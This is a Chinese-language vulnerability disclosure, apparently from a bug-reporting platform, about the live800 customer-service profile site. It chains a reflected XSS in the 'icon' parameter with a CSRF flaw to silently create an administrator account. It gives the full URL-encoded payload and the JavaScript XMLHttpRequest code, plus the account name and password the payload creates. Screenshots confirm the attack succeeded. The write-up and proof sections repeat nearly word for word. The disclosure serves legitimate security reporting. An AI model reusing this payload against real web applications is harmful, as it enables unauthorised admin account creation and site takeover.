### 简要描述:
M 锅在测试 XSS 的时候,我乱入了然后我也发现了点问题来提交了!
### 详细说明:
先直接上 payload:
```
http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22%3Burlx%3D%22http%3A%2F%2Fprofile.live800.com%2Fprofile%2FaddOperatorManageAction.action%22%3BDatax%3D%22loginName%3Dadmin1%26name%3Djin%26nickName%3Djin%26ability%3D100%26attendAcd%3D1%26role%3DoperatorManager%26skills%3D%26phone1%3D%26email%3D%26passWord%3Dx123123%22%3Bxmlhttp1%3Dnew%20XMLHttpRequest%3Bxmlhttp1.open(%22POST%22%2Curlx%2C!0)%3Bxmlhttp1.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Bxmlhttp1.send(Datax)%3B%2F%2F
```
1.首先发现了个 CSRF 虽然没做 token 跟来源页的判断但是做了同域的判断,跟 sohu 微博一样如果不是同域的话就不会提交成功。
2.由于CSRF 漏洞存在于profile.live800.com 那么便在 profile 域里的网页里刷新了几下抓了个包。便很快就找到了 反射型xss。
open url --> http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22;alert(1);//
打开便会弹窗应该需要登录。(如果没登录的话 csrf 也没意义了);
由于输入点出现在 js 里,所以浏览器不会拦截!
然后我们来看下 csrf :
存在于:http://profile.live800.com/profile/findOperatorManageAction.action?skillId&webClass=live800.web.class.internal_Coordination
这个页面的添加用户这里。
然后抓了一下包,构造了 js 语句:
```
urlx="http://profile.live800.com/profile/addOperatorManageAction.action";Datax="loginName=admin1&name=jin&nickName=jin&ability=100&attendAcd=1&role=operatorManager&skills=&phone1=&email=&passWord=x123123";xmlhttp1=new XMLHttpRequest;xmlhttp1.open("POST",urlx,!0);xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xmlhttp1.send(Datax);
```
都放在一行了 可能看起来有点乱,就是 post 添加管理界面,然后带上一些必须的属性跟值!
然后把这个代码 放到那个反射型 XSS 里面去:
```
http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22%3Burlx%3D%22http%3A%2F%2Fprofile.live800.com%2Fprofile%2FaddOperatorManageAction.action%22%3BDatax%3D%22loginName%3Dadmin1%26name%3Djin%26nickName%3Djin%26ability%3D100%26attendAcd%3D1%26role%3DoperatorManager%26skills%3D%26phone1%3D%26email%3D%26passWord%3Dx123123%22%3Bxmlhttp1%3Dnew%20XMLHttpRequest%3Bxmlhttp1.open(%22POST%22%2Curlx%2C!0)%3Bxmlhttp1.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Bxmlhttp1.send(Datax)%3B%2F%2F
```
把这个代码放到浏览器里执行便会添加一个叫 jin 的管理员 ID是:admin1 密码是 x123123
现在我们来执行一下看看,首先当前界面的管理员如下:
[<img src="https://images.seebug.org/upload/201409/24171931bec01d194559da28548b04e029bec406.png" alt="QQ20140924-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24171931bec01d194559da28548b04e029bec406.png)
可以看到只有一个 admin 的管理员,现在我们访问一下 xss:
[<img src="https://images.seebug.org/upload/201409/24172018dd204e0adf89fda33b7aeda020eee378.png" alt="QQ20140924-2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24172018dd204e0adf89fda33b7aeda020eee378.png)
然后再来看看现在我们的管理员界面:
[<img src="https://images.seebug.org/upload/201409/24172049ed130449492d62dcfde93de4ff2e13e9.png" alt="QQ20140924-4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24172049ed130449492d62dcfde93de4ff2e13e9.png)
可以看到添加成功了!
### 漏洞证明:
先直接上 payload:
```
http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22%3Burlx%3D%22http%3A%2F%2Fprofile.live800.com%2Fprofile%2FaddOperatorManageAction.action%22%3BDatax%3D%22loginName%3Dadmin1%26name%3Djin%26nickName%3Djin%26ability%3D100%26attendAcd%3D1%26role%3DoperatorManager%26skills%3D%26phone1%3D%26email%3D%26passWord%3Dx123123%22%3Bxmlhttp1%3Dnew%20XMLHttpRequest%3Bxmlhttp1.open(%22POST%22%2Curlx%2C!0)%3Bxmlhttp1.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Bxmlhttp1.send(Datax)%3B%2F%2F
```
1.首先发现了个 CSRF 虽然没做 token 跟来源页的判断但是做了同域的判断,跟 sohu 微博一样如果不是同域的话就不会提交成功。
2.由于CSRF 漏洞存在于profile.live800.com 那么便在 profile 域里的网页里刷新了几下抓了个包。便很快就找到了 反射型xss。
open url --> http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22;alert(1);//
打开便会弹窗应该需要登录。(如果没登录的话 csrf 也没意义了);
由于输入点出现在 js 里,所以浏览器不会拦截!
然后我们来看下 csrf :
存在于:http://profile.live800.com/profile/findOperatorManageAction.action?skillId&webClass=live800.web.class.internal_Coordination
这个页面的添加用户这里。
然后抓了一下包,构造了 js 语句:
```
urlx="http://profile.live800.com/profile/addOperatorManageAction.action";Datax="loginName=admin1&name=jin&nickName=jin&ability=100&attendAcd=1&role=operatorManager&skills=&phone1=&email=&passWord=x123123";xmlhttp1=new XMLHttpRequest;xmlhttp1.open("POST",urlx,!0);xmlhttp1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xmlhttp1.send(Datax);
```
都放在一行了 可能看起来有点乱,就是 post 添加管理界面,然后带上一些必须的属性跟值!
然后把这个代码 放到那个反射型 XSS 里面去:
```
http://profile.live800.com/profile/companyInfoViewCompanyAction.action?icon=%22%3Burlx%3D%22http%3A%2F%2Fprofile.live800.com%2Fprofile%2FaddOperatorManageAction.action%22%3BDatax%3D%22loginName%3Dadmin1%26name%3Djin%26nickName%3Djin%26ability%3D100%26attendAcd%3D1%26role%3DoperatorManager%26skills%3D%26phone1%3D%26email%3D%26passWord%3Dx123123%22%3Bxmlhttp1%3Dnew%20XMLHttpRequest%3Bxmlhttp1.open(%22POST%22%2Curlx%2C!0)%3Bxmlhttp1.setRequestHeader(%22Content-Type%22%2C%22application%2Fx-www-form-urlencoded%22)%3Bxmlhttp1.send(Datax)%3B%2F%2F
```
把这个代码放到浏览器里执行便会添加一个叫 jin 的管理员 ID是:admin1 密码是 x123123
现在我们来执行一下看看,首先当前界面的管理员如下:
[<img src="https://images.seebug.org/upload/201409/24171931bec01d194559da28548b04e029bec406.png" alt="QQ20140924-1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24171931bec01d194559da28548b04e029bec406.png)
可以看到只有一个 admin 的管理员,现在我们访问一下 xss:
[<img src="https://images.seebug.org/upload/201409/24172018dd204e0adf89fda33b7aeda020eee378.png" alt="QQ20140924-2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24172018dd204e0adf89fda33b7aeda020eee378.png)
然后再来看看现在我们的管理员界面:
[<img src="https://images.seebug.org/upload/201409/24172049ed130449492d62dcfde93de4ff2e13e9.png" alt="QQ20140924-4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201409/24172049ed130449492d62dcfde93de4ff2e13e9.png)
可以看到添加成功了!
京公网安备 11010502034610号
暂无评论